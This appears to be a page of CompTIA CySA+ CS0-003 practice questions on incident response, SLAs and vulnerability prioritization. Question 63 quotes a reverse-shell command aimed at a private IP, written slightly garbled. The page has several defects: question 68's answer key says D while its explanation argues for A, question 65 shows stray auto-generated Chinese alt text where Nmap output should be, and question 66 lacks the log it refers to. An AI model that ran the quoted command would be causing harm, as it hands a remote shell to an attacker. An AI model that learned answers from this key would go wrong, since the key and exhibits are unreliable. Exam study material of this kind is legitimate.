Practice Free CS0-003 Exam Online Questions – Page 7

Question #61

A security manager reviews the permissions for the approved users of a shared folder and finds accounts that are not on the approved access list. While investigating an incident, a user discovers data discrepancies in the file.

Which of the following best describes this activity?

A . Filesystem anomaly
B . Illegal software
C . Unauthorized changes
D . Data exfiltration

Reveal Solution Hide Solution

Question #62

A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs crypto miners on workstations in the office).

Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?

A . Help desk
B . Law enforcement
C . Legal department
D . Board member

Reveal Solution Hide Solution

Question #63

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A . RCE
B . Reverse shell
C . XSS
D . SQL injection

Reveal Solution Hide Solution

Question #64

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst.

Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A . SLA
B . MOU
C . NDA
D . Limitation of liability

Reveal Solution Hide Solution

Question #65

Given the Nmap request below:

报纸上的文字

描述已自动生成

Which of the following actions will an attacker be able to initiate directly against this host?

A . Password sniffing
B . ARP spoofing
C . A brute-force attack
D . An SQL injection

Reveal Solution Hide Solution

Question #66

A group of hacktivists has breached and exfiltrated data from several of a bank’s competitors.

Given the following network log output:

Which of the following represents the greatest concerns with regard to potential data exfiltration? (Select two.)

A . 1
B . 2
C . 3
D . 4
E . 5
F . 6
G . 7

Reveal Solution Hide Solution

Question #67

A cybersecurity analyst is researching operational data to develop a script that will detect the presence of a threat on corporate assets.

Which of the following contains the most useful information to produce this script?

A . API documentation
B . Protocol analysis captures
C . MITRE ATT&CK reports
D . OpenloC files

Reveal Solution Hide Solution

Question #68

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

A . SLA
B . MOU
C . Best-effort patching
D . Organizational governance

Reveal Solution Hide Solution

Correct Answer: D
D

Explanation:

An SLA (Service Level Agreement) is a contract or agreement between a service provider and a customer that defines the expected level of service, performance, quality, and availability of the service. An SLA also specifies the responsibilities, obligations, and penalties for both parties in case of non-compliance or breach of the agreement. An SLA can help organizations to ensure that their security services are delivered in a timely and effective manner, and that any security incidents or vulnerabilities are addressed and resolved within a specified time frame. An SLA can also help to establish clear communication, expectations, and accountability between the service provider and the customer12

An MOU (Memorandum of Understanding) is a document that expresses a mutual agreement or understanding between two or more parties on a common goal or objective. An MOU is not legally binding, but it can serve as a basis for future cooperation or collaboration. An MOU may not be suitable for requiring remediation of a known threat within a given time frame, as it does not have the same level of enforceability, specificity, or measurability as an SLA.

Best-effort patching is an informal and ad hoc approach to applying security patches or updates to systems or software. Best-effort patching does not follow any defined process, policy, or schedule, and relies on the availability and discretion of the system administrators or users. Best-effort patching may not be effective or efficient for requiring remediation of a known threat within a given time frame, as it does not guarantee that the patches are applied correctly, consistently, or promptly. Best-effort patching may also introduce new risks or vulnerabilities due to human error, compatibility issues, or lack of testing.

Organizational governance is the framework of rules, policies, procedures, and processes that guide and direct the activities and decisions of an organization. Organizational governance can help to establish the roles, responsibilities, and accountabilities of different stakeholders within the organization, as well as the goals, values, and principles that shape the organizational culture and behavior. Organizational governance can also help to ensure compliance with internal and external standards, regulations, and laws. Organizational governance may not be sufficient for requiring remediation of a known threat within a given time frame, as it does not specify the details or metrics of the service delivery or performance. Organizational governance may also vary depending on the size, structure, and nature of the organization.

Question #69

A vulnerability manager analyzes suspicious data after scanning a database.

Which of the following should the manager do to prioritize the remediation tasks?

A . Conduct further analysis and send the findings report to the incident response team.
B . Perform an assessment in the command line and determine if there are true or false positives.
C . Identify the impact level and create a ticket that includes the time frame for fixing the issue.
D . Apply compensating controls and advise an analyst to document the problem in a risk register.

Reveal Solution Hide Solution

Correct Answer: B
B

Explanation:

Comprehensive and Detailed Explanation From Exact Extract:

The key phrase is “analyzes suspicious data after scanning”. Before you can prioritize remediation, you must first ensure the scan results are valid―i.e., determine whether the findings are true positives vs. false positives. That validation step is a core part of vulnerability management because it prevents wasting time remediating issues that do not actually exist and ensures your prioritization decisions are based on accurate findings.

The All-in-One CySA+ CS0-003 guide explicitly states that after receiving vulnerability scan data, the analyst’s review process must focus on validating reported vulnerabilities (true/false positives). It also directly ties this to remediation/prioritization.

Exact extract (All-in-One Exam Guide):

“It is up to the analyst to review and make sense of vulnerability data and findings… The two most important outcomes of the review process are to determine the validity of reported vulnerabilities…”

It further emphasizes the importance of differentiating true positives from false positives for remediation and prioritization:

Exact extract (All-in-One Exam Guide):

“Distinguishing true positives from false positives… can be a tricky part of vulnerability remediation and prioritization.”

So, Option B (determine true/false positives) is the best action specifically to prioritize remediation tasks based on scan results.

Why the other options are not best:

A: Sending to IR may be appropriate if there is evidence of an active incident, but the question is framed as post-scan vulnerability management (not confirmed incident handling). Validation comes first.

C: Tickets and timeframes are important (often driven by SLAs/SLOs), but setting those correctly depends on confirming the findings are real and understanding severity/impact first.

D: Compensating controls and risk register entries are appropriate when remediation is not immediately feasible, but again you must confirm validity and then prioritize based on risk/impact.

Reference (CompTIA CySA+ CS0-003 documents / study guides used):

Mya Heath et al., CompTIA CySA+ All-in-One Exam Guide (CS0-003): validating vulnerability scan results; true/false positives; link to remediation prioritization

Question #70

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls.

Which of the following would best address this issue?

A . Increasing training and awareness for all staff
B . Ensuring that malicious websites cannot be visited
C . Blocking all scripts downloaded from the internet
D . Disabling all staff members’ ability to run downloaded applications

Reveal Solution Hide Solution

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

Exams